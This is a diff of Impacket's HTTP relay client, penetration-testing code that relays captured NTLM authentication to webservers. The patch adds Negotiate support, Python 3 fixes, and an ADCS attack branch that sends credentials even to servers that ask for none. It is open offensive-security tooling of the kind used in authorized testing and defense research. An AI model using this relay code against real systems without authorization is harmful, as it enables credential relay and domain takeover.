@@ -1,18 +1,19 @@
-# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+# Impacket - Collection of Python classes for working with network protocols.
 #
-# This software is provided under under a slightly modified version
+# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# HTTP Protocol Client
+# Description:
+#   HTTP Protocol Client
+#   HTTP(s) client for relaying NTLMSSP authentication to webservers
 #
 # Author:
 #   Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
 #   Alberto Solino (@agsolino)
 #
-# Description:
-# HTTP(s) client for relaying NTLMSSP authentication to webservers
-#
 import re
 import ssl
 try:
@@ -39,6 +40,7 @@ class HTTPRelayClient(ProtocolClient):
         self.negotiateMessage = None
         self.authenticateMessageBlob = None
         self.server = None
+        self.authenticationMethod = None
 
     def initConnection(self):
         self.session = HTTPConnection(self.targetHost,self.targetPort)
@@ -57,27 +59,35 @@ class HTTPRelayClient(ProtocolClient):
         if res.status != 401:
             LOG.info('Status code returned: %d. Authentication does not seem required for URL' % res.status)
         try:
-            if 'NTLM' not in res.getheader('WWW-Authenticate'):
+            if 'NTLM' not in res.getheader('WWW-Authenticate') and 'Negotiate' not in res.getheader('WWW-Authenticate'):
                 LOG.error('NTLM Auth not offered by URL, offered protocols: %s' % res.getheader('WWW-Authenticate'))
                 return False
+            if 'NTLM' in res.getheader('WWW-Authenticate'):
+                self.authenticationMethod = "NTLM"
+            elif 'Negotiate' in res.getheader('WWW-Authenticate'):
+                self.authenticationMethod = "Negotiate"
         except (KeyError, TypeError):
             LOG.error('No authentication requested by the server for url %s' % self.targetHost)
-            return False
+            if self.serverConfig.isADCSAttack:
+                LOG.info('IIS cert server may allow anonymous authentication, sending NTLM auth anyways')
+            else:
+                return False
 
         #Negotiate auth
-        negotiate = base64.b64encode(negotiateMessage)
-        headers = {'Authorization':'NTLM %s' % negotiate}
+        negotiate = base64.b64encode(negotiateMessage).decode("ascii")
+        headers = {'Authorization':'%s %s' % (self.authenticationMethod, negotiate)}
         self.session.request('GET', self.path ,headers=headers)
         res = self.session.getresponse()
         res.read()
         try:
-            serverChallengeBase64 = re.search('NTLM ([a-zA-Z0-9+/]+={0,2})', res.getheader('WWW-Authenticate')).group(1)
+            serverChallengeBase64 = re.search(('%s ([a-zA-Z0-9+/]+={0,2})' % self.authenticationMethod), res.getheader('WWW-Authenticate')).group(1)
             serverChallenge = base64.b64decode(serverChallengeBase64)
             challenge = NTLMAuthChallenge()
             challenge.fromString(serverChallenge)
             return challenge
         except (IndexError, KeyError, AttributeError):
             LOG.error('No NTLM challenge returned from server')
+            return False
 
     def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
         if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
@@ -85,8 +95,8 @@ class HTTPRelayClient(ProtocolClient):
             token = respToken2['ResponseToken']
         else:
             token = authenticateMessageBlob
-        auth = base64.b64encode(token)
-        headers = {'Authorization':'NTLM %s' % auth}
+        auth = base64.b64encode(token).decode("ascii")
+        headers = {'Authorization':'%s %s' % (self.authenticationMethod, auth)}
         self.session.request('GET', self.path,headers=headers)
         res = self.session.getresponse()
         if res.status == 401:
